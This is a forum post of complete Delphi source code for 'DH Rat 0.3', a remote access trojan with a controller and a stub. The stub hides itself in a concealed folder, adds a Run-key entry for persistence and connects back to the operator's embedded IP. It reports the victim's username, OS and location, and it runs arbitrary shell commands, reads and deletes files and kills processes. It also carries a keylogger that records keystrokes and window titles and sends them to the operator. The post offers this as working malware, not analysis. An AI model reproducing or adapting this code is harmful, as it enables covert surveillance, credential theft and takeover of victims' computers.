0 Members and 1 Guest are viewing this topic.
// DH Rat 0.3// (C) Doddy Hackman 2013unit rat;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, sSkinManager, ComCtrls, sStatusBar, sPageControl, StdCtrls, sGroupBox, ShellApi, sListView, sMemo, sEdit, sButton, acPNG, ExtCtrls, sLabel, ScktComp, Menus, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, madRes, WinInet;type TForm1 = class(TForm) sSkinManager1: TsSkinManager; sStatusBar1: TsStatusBar; sPageControl1: TsPageControl; sTabSheet1: TsTabSheet; sTabSheet2: TsTabSheet; sTabSheet3: TsTabSheet; sTabSheet4: TsTabSheet; sGroupBox1: TsGroupBox; sGroupBox2: TsGroupBox; sListView1: TsListView; sMemo1: TsMemo; sGroupBox3: TsGroupBox; sGroupBox4: TsGroupBox; sEdit1: TsEdit; sGroupBox5: TsGroupBox; sButton1: TsButton; sGroupBox6: TsGroupBox; Image1: TImage; sLabel1: TsLabel; ServerSocket1: TServerSocket; PopupMenu1: TPopupMenu; O1: TMenuItem; C1: TMenuItem; L1: TMenuItem; D1: TMenuItem; R1: TMenuItem; S1: TMenuItem; J1: TMenuItem; M1: TMenuItem; T1: TMenuItem; ifPoslistarprocesoscode0then1: TMenuItem; K1: TMenuItem; C2: TMenuItem; C3: TMenuItem; H1: TMenuItem; S2: TMenuItem; H2: TMenuItem; S3: TMenuItem; K2: TMenuItem; PopupMenu2: TPopupMenu; S4: TMenuItem; S5: TMenuItem; Image2: TImage; sGroupBox7: TsGroupBox; sGroupBox8: TsGroupBox; Image3: TImage; sButton2: TsButton; OpenDialog1: TOpenDialog; sEdit2: TsEdit; procedure ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket); procedure O1Click(Sender: TObject); procedure C1Click(Sender: TObject); procedure ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket); procedure L1Click(Sender: TObject); procedure D1Click(Sender: TObject); procedure R1Click(Sender: TObject); procedure S1Click(Sender: TObject); procedure J1Click(Sender: TObject); procedure M1Click(Sender: TObject); procedure T1Click(Sender: TObject); procedure ifPoslistarprocesoscode0then1Click(Sender: TObject); procedure K1Click(Sender: TObject); procedure C2Click(Sender: TObject); procedure C3Click(Sender: TObject); procedure H1Click(Sender: TObject); procedure S2Click(Sender: TObject); procedure H2Click(Sender: TObject); procedure S3Click(Sender: TObject); procedure K2Click(Sender: TObject); procedure FormCreate(Sender: TObject); procedure S4Click(Sender: TObject); procedure S5Click(Sender: TObject); procedure sButton2Click(Sender: TObject); procedure sEdit1DblClick(Sender: TObject); procedure sButton1Click(Sender: TObject); private { Private declarations } public { Public declarations } end;var Form1: TForm1; argumento: string;implementation{$R *.dfm}// Functionsfunction toma(const pagina: string): UTF8String;// Credits : Based on http://www.scalabium.com/faq/dct0080.htm// Thanks to www.scalabium.comvar nave1: HINTERNET; nave2: HINTERNET; tou: DWORD; codez: UTF8String; codee: array [0 .. 1023] of byte; finalfinal: string;begin try begin finalfinal := ''; Result := ''; nave1 := InternetOpen( 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12' , INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0); nave2 := InternetOpenUrl(nave1, PChar(pagina), nil, 0, INTERNET_FLAG_RELOAD, 0); repeat begin InternetReadFile(nave2, @codee, SizeOf(codee), tou); SetString(codez, PAnsiChar(@codee[0]), tou); finalfinal := finalfinal + codez; end; until tou = 0; InternetCloseHandle(nave2); InternetCloseHandle(nave1); Result := finalfinal; end; except // end;end;function regex(text: String; deaca: String; hastaaca: String): String;begin Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1); SetLength(text, AnsiPos(hastaaca, text) - 1); Result := text;end;function dhencode(texto, opcion: string): string;// Thanks to Taqyon// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hexvar num: integer; aca: string; cantidad: integer;begin num := 0; Result := ''; aca := ''; cantidad := 0; if (opcion = 'encode') then begin cantidad := Length(texto); for num := 1 to cantidad do begin aca := IntToHex(ord(texto[num]), 2); Result := Result + aca; end; end; if (opcion = 'decode') then begin cantidad := Length(texto); for num := 1 to cantidad div 2 do begin aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2))); Result := Result + aca; end; end;end;procedure savefile(filename, texto: string);var ar: TextFile;begin AssignFile(ar, filename); FileMode := fmOpenWrite; if FileExists(filename) then Append(ar) else Rewrite(ar); Write(ar, texto); CloseFile(ar);end;//procedure TForm1.FormCreate(Sender: TObject);begin sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data'; sSkinManager1.SkinName := 'matrix'; sSkinManager1.Active := True; try begin sListView1.Items.Clear; ServerSocket1.Port := 6664; ServerSocket1.Open; sStatusBar1.Panels[0].text := '[+] Online'; Form1.sStatusBar1.Update; end; except sStatusBar1.Panels[0].text := '[-] Error'; Form1.sStatusBar1.Update; end;end;procedure TForm1.C1Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText('![closecd]');end;procedure TForm1.C2Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Command', 'net user'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![ejecutar] [argumento]' + argumento + '[argumento]');end;procedure TForm1.C3Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Number', '123'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![crazymouse] [argumento]' + argumento + '[argumento]');end;procedure TForm1.D1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'File', 'C:/XAMPP/test.txt'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![borraresto] [argumento]' + argumento + '[argumento]');end;procedure TForm1.H1Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![ocultartaskbar]');end;procedure TForm1.H2Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![ocultariconos]');end;procedure TForm1.ifPoslistarprocesoscode0then1Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![listarprocesos]');end;procedure TForm1.J1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Keys', 'No tengas miedo'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![escribirword] [argumento]' + argumento + '[argumento]');end;procedure TForm1.K1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'PID', ''); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![matarproceso] [argumento]' + argumento + '[argumento]');end;procedure TForm1.K2Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![keyloggerlogs]');end;procedure TForm1.L1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Directory', 'C:/XAMPP'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![listardirectorio] [argumento]' + argumento + '[argumento]');end;procedure TForm1.M1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Text', 'No tengas miedo'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![mensaje] [argumento]' + argumento + '[argumento]');end;procedure TForm1.O1Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText('![opencd]');end;procedure TForm1.R1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Directory', 'C:/XAMPP'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![leerarchivo] [argumento]' + argumento + '[argumento]');end;procedure TForm1.S1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Keys', 'No tengas miedo'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![sendkeys] [argumento]' + argumento + '[argumento]');end;procedure TForm1.S2Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![volvertaskbar]');end;procedure TForm1.S3Click(Sender: TObject);begin ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![volvericonos]');end;procedure TForm1.T1Click(Sender: TObject);begin argumento := InputBox('DH Rat', 'Text', 'Mother Fucker'); ServerSocket1.Socket.Connections[sListView1.Itemindex].SendText ('![hablar] [argumento]' + argumento + '[argumento]');end;procedure TForm1.S4Click(Sender: TObject);begin try begin ServerSocket1.Port := 6664; ServerSocket1.Open; sListView1.Items.Clear; sStatusBar1.Panels[0].text := '[+] Online'; Form1.sStatusBar1.Update; end; except sStatusBar1.Panels[0].text := '[-] Error'; Form1.sStatusBar1.Update; end;end;procedure TForm1.S5Click(Sender: TObject);begin try begin sListView1.Items.Clear; ServerSocket1.Close; sStatusBar1.Panels[0].text := '[+] OffLine'; Form1.sStatusBar1.Update; end; except sStatusBar1.Panels[0].text := '[-] Error'; Form1.sStatusBar1.Update; end;end;procedure TForm1.sButton1Click(Sender: TObject);var linea: string; aca: THandle; code: Array [0 .. 9999 + 1] of Char; nose: DWORD; marca_uno: string; lineafinal: string; stubgenerado: string; change: DWORD; valor: string;begin stubgenerado := 'server_ready.exe'; lineafinal := '[ip]' + sEdit1.text + '[ip]'; marca_uno := '[63686175]' + dhencode(lineafinal, 'encode') + '[63686175]'; aca := INVALID_HANDLE_VALUE; nose := 0; DeleteFile(stubgenerado); CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' + 'Data/stubnow.exe'), PChar(ExtractFilePath(Application.ExeName) + '/' + stubgenerado), True); linea := marca_uno; StrCopy(code, PChar(linea)); aca := CreateFile(PChar(stubgenerado), GENERIC_WRITE, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); if (aca <> INVALID_HANDLE_VALUE) then begin SetFilePointer(aca, 0, nil, FILE_END); WriteFile(aca, code, 9999, nose, nil); CloseHandle(aca); end; // if not(sEdit2.text = '') then begin try begin valor := IntToStr(128); change := BeginUpdateResourceW (PWideChar(wideString(ExtractFilePath(Application.ExeName) + '/' + stubgenerado)), False); LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0, PWideChar(wideString(sEdit2.text))); EndUpdateResourceW(change, False); sStatusBar1.Panels[0].text := '[+] Done '; sStatusBar1.Update; end; except begin sStatusBar1.Panels[0].text := '[-] Error'; sStatusBar1.Update; end; end; end else begin sStatusBar1.Panels[0].text := '[+] Done '; sStatusBar1.Update; end; //end;procedure TForm1.sButton2Click(Sender: TObject);begin OpenDialog1.InitialDir := GetCurrentDir; OpenDialog1.Filter := 'ICO|*.ico|'; if OpenDialog1.Execute then begin Image3.Picture.LoadFromFile(OpenDialog1.filename); sEdit2.text := OpenDialog1.filename; end;end;procedure TForm1.sEdit1DblClick(Sender: TObject);var code, ip: string;begin code := toma('http://whatismyipaddress.com/'); ip := regex(code, 'alt="Click for more about ', '"></a>'); sEdit1.text := ip;end;procedure TForm1.ServerSocket1ClientConnect(Sender: TObject; Socket: TCustomWinSocket);begin with sListView1.Items.Add do begin Caption := Socket.RemoteHost; SubItems.Add('?'); SubItems.Add('?'); SubItems.Add('?'); SubItems.Add('?'); end;end;procedure TForm1.ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket);var code: string; host: string; ip: string; pais: string; username: string; os: string;begin code := Socket.ReceiveText; if (Pos('[datos_nuevos][ip]', code) > 0) then begin ip := regex(code, '[ip]', '[ip]'); pais := regex(code, '[pais]', '[pais]'); username := regex(code, '[username]', '[username]'); os := regex(code, '[os]', '[os]'); sListView1.Items[sListView1.Items.Count - 1].SubItems[0] := ip; sListView1.Items[sListView1.Items.Count - 1].SubItems[1] := pais; sListView1.Items[sListView1.Items.Count - 1].SubItems[2] := username; sListView1.Items[sListView1.Items.Count - 1].SubItems[3] := os; sMemo1.Lines.Add('[+] Update Target : OK'); end else if (Pos('![keyloggerlogs]', code) > 0) then begin if (FileExists('logs_keylogger.html')) then begin DeleteFile('logs_keylogger.html'); end; savefile('logs_keylogger.html', code); sMemo1.Lines.Add('[+] Keylogger : OK'); ShellExecute(0, nil, PChar(ExtractFilePath(Application.ExeName) + 'logs_keylogger.html'), nil, nil, SW_SHOWNORMAL); end else begin sMemo1.Lines.Add(code); end;end;end.// The End ?
// DH Rat 0.3// (C) Doddy Hackman 2013// Stubunit stub;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, MMSystem, ComObj, ShellApi, tlhelp32, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, IdHTTP, IdIPMCastBase, IdIPMCastServer, ScktComp, sButton, ExtCtrls;type TForm1 = class(TForm) IdHTTP1: TIdHTTP; ClientSocket1: TClientSocket; Timer1: TTimer; Timer2: TTimer; function datanow(): string; procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket); procedure sButton1Click(Sender: TObject); procedure ClientSocket1Connect(Sender: TObject; Socket: TCustomWinSocket); procedure FormCreate(Sender: TObject); procedure Timer1Timer(Sender: TObject); procedure Timer2Timer(Sender: TObject); private Nombre2: string; { Private declarations } public { Public declarations } end;var Form1: TForm1; acatoy: string;implementation{$R *.dfm}{$POINTERMATH ON}// Functionsfunction dhencode(texto, opcion: string): string;// Thanks to Taqyon// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hexvar num: integer; aca: string; cantidad: integer;begin num := 0; Result := ''; aca := ''; cantidad := 0; if (opcion = 'encode') then begin cantidad := Length(texto); for num := 1 to cantidad do begin aca := IntToHex(ord(texto[num]), 2); Result := Result + aca; end; end; if (opcion = 'decode') then begin cantidad := Length(texto); for num := 1 to cantidad div 2 do begin aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2))); Result := Result + aca; end; end;end;procedure savefile(filename, texto: string);var ar: TextFile;begin try begin AssignFile(ar, filename); FileMode := fmOpenWrite; if FileExists(filename) then Append(ar) else Rewrite(ar); Write(ar, texto); CloseFile(ar); end; except // end;end;function regex(text: String; deaca: String; hastaaca: String): String;begin Delete(text, 1, AnsiPos(deaca, text) + Length(deaca) - 1); SetLength(text, AnsiPos(hastaaca, text) - 1); Result := text;end;function listardirectorio(dir: string): string;var busqueda: TSearchRec; code: string;begin code := ''; FindFirst(dir + '\*.*', faAnyFile + faDirectory + faReadOnly, busqueda); code := code + '[+] : ' + busqueda.Name + sLineBreak; while FindNext(busqueda) = 0 do begin code := code + '[+] : ' + busqueda.Name + sLineBreak; end; Result := code; FindClose(busqueda);end;function borraresto(archivo: string): string;var code: string;begin code := ''; if DirectoryExists(archivo) then begin if (RemoveDir(archivo)) then begin code := '[+] Directory removed'; end else begin code := '[+] Error'; end; end; if FileExists(archivo) then begin if (DeleteFile(archivo)) then begin code := '[+] File removed'; end else begin code := '[+] Error'; end; end; Result := code;end;function LeerArchivo(const archivo: TFileName): String;var lista: TStringList;begin if (FileExists(archivo)) then begin lista := TStringList.Create; lista.Loadfromfile(archivo); Result := lista.text; lista.Free; end;end;function lectora(opcion: string): string;var code: string;begin code := ''; if (opcion = 'open') then begin mciSendString('Set cdaudio door open wait', nil, 0, 0); code := '[+] Open CD : OK'; end else begin mciSendString('Set cdaudio door closed wait', nil, 0, 0); code := '[+] Close CD : OK'; end; Result := code;end;function cambiar_barra(opcion: string): string;var code: string;begin code := ''; if (opcion = 'hide') then begin ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_HIDE); code := '[+] Hidden Taskbar : OK'; end else begin ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNA); code := '[+] Show Taskbar : OK'; end; Result := code;end;function cambiar_iconos(opcion: string): string;var code: string; acatoy: THandle;begin code := ''; acatoy := FindWindow('ProgMan', nil); acatoy := GetWindow(acatoy, GW_CHILD); if (opcion = 'hide') then begin ShowWindow(acatoy, SW_HIDE); code := '[+] Hidden Icons : OK'; end else begin ShowWindow(acatoy, SW_SHOW); code := '[+] Show Icons : OK'; end; Result := code;end;function mensaje(texto: string): string;var code: string;begin code := ''; ShowMessage(texto); code := '[+] Message Sent'; Result := code;end;function hablar(text: string): string;var Voice: Variant; code: string;begin code := ''; Voice := CreateOLEObject('SAPI.SpVoice'); Voice.speak(text); code := '[+] Voice Speak : OK'; Result := code;end;function SendKeys(texto: string): string;// Thanks to Remy Lebeau for the helpvar eventos: PInput; controlb, controla: integer; code: string;begin code := ''; code := '[+] SendKeys : OK'; GetMem(eventos, SizeOf(TInput) * (Length(texto) * 2)); controla := 0; for controlb := 1 to Length(texto) do begin eventos[controla].Itype := INPUT_KEYBOARD; eventos[controla].ki.wVk := 0; eventos[controla].ki.wScan := ord(texto[controlb]); eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE; eventos[controla].ki.time := 0; eventos[controla].ki.dwExtraInfo := 0; Inc(controla); eventos[controla].Itype := INPUT_KEYBOARD; eventos[controla].ki.wVk := 0; eventos[controla].ki.wScan := ord(texto[controlb]); eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE or KEYEVENTF_KEYUP; eventos[controla].ki.time := 0; eventos[controla].ki.dwExtraInfo := 0; Inc(controla); end; SendInput(controla, eventos[0], SizeOf(TInput)); Result := code;end;function escribir_word(texto: string): string;var code: string;begin code := ''; code := '[+] Word Joke : OK'; ShellExecute(0, nil, PChar('winword.exe'), nil, nil, SW_SHOWNORMAL); Sleep(5000); SendKeys(texto); Result := code;end;function listarprocesos(): string;var conector: THandle; timbre: LongBool; indicio: TProcessEntry32; code: string;begin code := ''; conector := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); indicio.dwSize := SizeOf(indicio); timbre := Process32First(conector, indicio); while timbre do begin code := code + '[+] Name : ' + indicio.szExeFile + ' [+] PID : ' + IntToStr (indicio.th32ProcessID) + sLineBreak; timbre := Process32Next(conector, indicio); end; Result := code;end;function matarproceso(pid: string): string;var vano: THandle; code: string;begin code := ''; vano := OpenProcess(PROCESS_TERMINATE, FALSE, StrToInt(pid)); if TerminateProcess(vano, 0) then begin code := '[+] Kill Process : OK'; end else begin code := '[+] Kill Process : ERROR'; end; Result := code;end;function ejecutar(cmd: string): string;// Credits : Function ejecutar() based in : http://www.delphidabbler.com/tips/61// Thanks to www.delphidabbler.comvar parte1: TSecurityAttributes; parte2: TStartupInfo; parte3: TProcessInformation; parte4: THandle; parte5: THandle; control2: Boolean; contez: array [0 .. 255] of AnsiChar; notengoidea: Cardinal; fix: Boolean; code: string;begin code := ''; with parte1 do begin nLength := SizeOf(parte1); bInheritHandle := True; lpSecurityDescriptor := nil; end; CreatePipe(parte4, parte5, @parte1, 0); with parte2 do begin FillChar(parte2, SizeOf(parte2), 0); cb := SizeOf(parte2); dwFlags := STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES; wShowWindow := SW_HIDE; hStdInput := GetStdHandle(STD_INPUT_HANDLE); hStdOutput := parte5; hStdError := parte5; end; fix := CreateProcess(nil, PChar('cmd.exe /C ' + cmd), nil, nil, True, 0, nil, PChar('c:/'), parte2, parte3); CloseHandle(parte5); if fix then repeat begin control2 := ReadFile(parte4, contez, 255, notengoidea, nil); end; if notengoidea > 0 then begin contez[notengoidea] := #0; code := code + contez; end; until not(control2) or (notengoidea = 0); Result := code;end;function crazy_mouse(number: string): string;var i: integer; code: string;begin code := ''; For i := 1 to StrToInt(number) do begin Sleep(1000); SetCursorPos(i, i); end; code := '[+] Crazy Mouse : OK'; Result := code;end;function TForm1.datanow(): string;var code: string; ip: string; pais: string; re: string; username: string; os: string;begin try begin code := IdHTTP1.Get('http://whatismyipaddress.com/'); ip := regex(code, 'alt="Click for more about ', '"></a>'); pais := regex(code, '<tr><th>Country:</th><td>', '</td></tr>'); if (ip = '') then begin ip := '?'; end; if (pais = '') then begin pais := '?'; end; username := GetEnvironmentVariable('username'); os := GetEnvironmentVariable('os'); re := '[datos_nuevos][ip]' + ip + '[ip]' + '[pais]' + pais + '[pais]' + '[username]' + username + '[username]' + '[os]' + os + '[os]'; end; except // end; Result := re;end;//procedure TForm1.ClientSocket1Connect(Sender: TObject; Socket: TCustomWinSocket);begin ClientSocket1.Socket.SendText(datanow());end;procedure TForm1.ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);var code: string; argumento: string;begin code := Socket.ReceiveText; argumento := regex(code, '[argumento]', '[argumento]'); if (Pos('![opencd]', code) > 0) then begin ClientSocket1.Socket.SendText(lectora('open')); end; if (Pos('![closecd]', code) > 0) then begin ClientSocket1.Socket.SendText(lectora('close')); end; if (Pos('![listardirectorio]', code) > 0) then begin ClientSocket1.Socket.SendText(listardirectorio(argumento)); end; if (Pos('![borraresto]', code) > 0) then begin ClientSocket1.Socket.SendText(borraresto(argumento)); end; if (Pos('![leerarchivo]', code) > 0) then begin ClientSocket1.Socket.SendText(LeerArchivo(argumento)); end; if (Pos('![keyloggerlogs]', code) > 0) then begin ClientSocket1.Socket.SendText('![keyloggerlogs]<br>' + LeerArchivo(acatoy)); end; if (Pos('![sendkeys]', code) > 0) then begin ClientSocket1.Socket.SendText(SendKeys(argumento)); end; if (Pos('![escribirword]', code) > 0) then begin ClientSocket1.Socket.SendText(escribir_word(argumento)); end; if (Pos('![mensaje]', code) > 0) then begin ClientSocket1.Socket.SendText(mensaje(argumento)); end; if (Pos('![hablar]', code) > 0) then begin ClientSocket1.Socket.SendText(hablar(argumento)); end; if (Pos('![matarproceso]', code) > 0) then begin ClientSocket1.Socket.SendText(matarproceso(argumento)); end; if (Pos('![ejecutar]', code) > 0) then begin ClientSocket1.Socket.SendText(ejecutar(argumento)); end; if (Pos('![crazymouse]', code) > 0) then begin ClientSocket1.Socket.SendText(crazy_mouse(argumento)); end; if (Pos('![ocultartaskbar]', code) > 0) then begin ClientSocket1.Socket.SendText(cambiar_barra('hide')); end; if (Pos('![volvertaskbar]', code) > 0) then begin ClientSocket1.Socket.SendText(cambiar_barra('na')); end; if (Pos('![ocultariconos]', code) > 0) then begin ClientSocket1.Socket.SendText(cambiar_iconos('hide')); end; if (Pos('![volvericonos]', code) > 0) then begin ClientSocket1.Socket.SendText(cambiar_iconos('na')); end; if (Pos('![listarprocesos]', code) > 0) then begin ClientSocket1.Socket.SendText(listarprocesos()); end;end;procedure TForm1.FormCreate(Sender: TObject);var dir_hide, dir, carpeta, nombrereal, directorio, rutareal, yalisto: string; registro: HKEY; ip: string; ob: THandle; code: Array [0 .. 9999 + 1] of Char; nose: DWORD; todo: string;begin Application.ShowMainForm := FALSE; ob := INVALID_HANDLE_VALUE; code := ''; ob := CreateFile(PChar(paramstr(0)), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0); if (ob <> INVALID_HANDLE_VALUE) then begin SetFilePointer(ob, -9999, nil, FILE_END); ReadFile(ob, code, 9999, nose, nil); CloseHandle(ob); end; todo := regex(code, '[63686175]', '[63686175]'); todo := dhencode(todo, 'decode'); ip := regex(todo, '[ip]', '[ip]'); try begin dir_hide := GetEnvironmentVariable('USERPROFILE') + '/'; carpeta := 'ratata'; dir := dir_hide + carpeta + '/'; if not(DirectoryExists(dir)) then begin CreateDir(dir); end; ChDir(dir); nombrereal := ExtractFileName(paramstr(0)); rutareal := dir; yalisto := dir + nombrereal; acatoy := dir + 'logs.html'; MoveFile(PChar(paramstr(0)), PChar(yalisto)); SetFileAttributes(PChar(dir), FILE_ATTRIBUTE_HIDDEN); SetFileAttributes(PChar(yalisto), FILE_ATTRIBUTE_HIDDEN); RegCreateKeyEx(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run\', 0, nil, REG_OPTION_NON_VOLATILE, KEY_WRITE, nil, registro, nil); RegSetValueEx(registro, 'uberk', 0, REG_SZ, PChar(yalisto), 666); RegCloseKey(registro); savefile('logs.html', '<style>body {background-color: black;color:#00FF00;cursor:crosshair;}</style>'); ClientSocket1.Address := ip; ClientSocket1.Port := 6664; ClientSocket1.Open; end; except // end;end;procedure TForm1.sButton1Click(Sender: TObject);begin ClientSocket1.Socket.SendText(datanow());end;procedure TForm1.Timer1Timer(Sender: TObject);var i: integer; Result: Longint; mayus: integer; shift: integer;const n_numeros_izquierda: array [1 .. 10] of string = ('48', '49', '50', '51', '52', '53', '54', '55', '56', '57');const t_numeros_izquierda: array [1 .. 10] of string = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9');const n_numeros_derecha: array [1 .. 10] of string = ('96', '97', '98', '99', '100', '101', '102', '103', '104', '105');const t_numeros_derecha: array [1 .. 10] of string = ('0', '1', '2', '3', '4', '5', '6', '7', '8', '9');const n_shift: array [1 .. 22] of string = ('48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '187', '188', '189', '190', '191', '192', '193', '291', '220', '221', '222', '226');const t_shift: array [1 .. 22] of string = (')', '!', '@', '#', '\$', '%', 'ยจ', '&', '*', '(', '+', '<', '_', '>', ':', '\', ' ? ', ' / \ ', '}', '{', '^', '|');const n_raros: array [1 .. 17] of string = ('1', '8', '13', '32', '46', '187', '188', '189', '190', '191', '192', '193', '219', '220', '221', '222', '226');const t_raros: array [1 .. 17] of string = ('[mouse click]', '[backspace]', '<br>[enter]<br>', '[space]', '[suprimir]', '=', ',', '-', '.', ';', '\', ' / ', ' \ \ \ ', ']', '[', '~', '\/');begin // Others for i := Low(n_raros) to High(n_raros) do begin Result := GetAsyncKeyState(StrToInt(n_raros[i])); If Result = -32767 then begin savefile('logs.html', t_raros[i]); end; end; // Numbers for i := Low(n_numeros_derecha) to High(n_numeros_derecha) do begin Result := GetAsyncKeyState(StrToInt(n_numeros_derecha[i])); If Result = -32767 then begin savefile('logs.html', t_numeros_derecha[i]); end; end; for i := Low(n_numeros_izquierda) to High(n_numeros_izquierda) do begin Result := GetAsyncKeyState(StrToInt(n_numeros_izquierda[i])); If Result = -32767 then begin savefile('logs.html', t_numeros_izquierda[i]); end; end; // SHIFT if (GetAsyncKeyState(VK_SHIFT) <> 0) then begin for i := Low(n_shift) to High(n_shift) do begin Result := GetAsyncKeyState(StrToInt(n_shift[i])); If Result = -32767 then begin savefile('logs.html', t_shift[i]); end; end; for i := 65 to 90 do begin Result := GetAsyncKeyState(i); If Result = -32767 then Begin savefile('logs.html', Chr(i + 0)); End; end; end; // MAYUS if (GetKeyState(20) = 0) then begin mayus := 32; end else begin mayus := 0; end; for i := 65 to 90 do begin Result := GetAsyncKeyState(i); If Result = -32767 then Begin savefile('logs.html', Chr(i + mayus)); End; end;end;procedure TForm1.Timer2Timer(Sender: TObject);var ventana1: array [0 .. 255] of Char; nombre1: string;begin GetWindowText(GetForegroundWindow, ventana1, SizeOf(ventana1)); nombre1 := ventana1; if not(nombre1 = Nombre2) then begin Nombre2 := nombre1; savefile('logs.html', '<hr style=color:#00FF00><h2><center>' + Nombre2 + '</h2></center><br>'); end;end;//end.// The End ?
Author
Topic: [Delphi] DH Rat 0.3 (Read 2835 times)
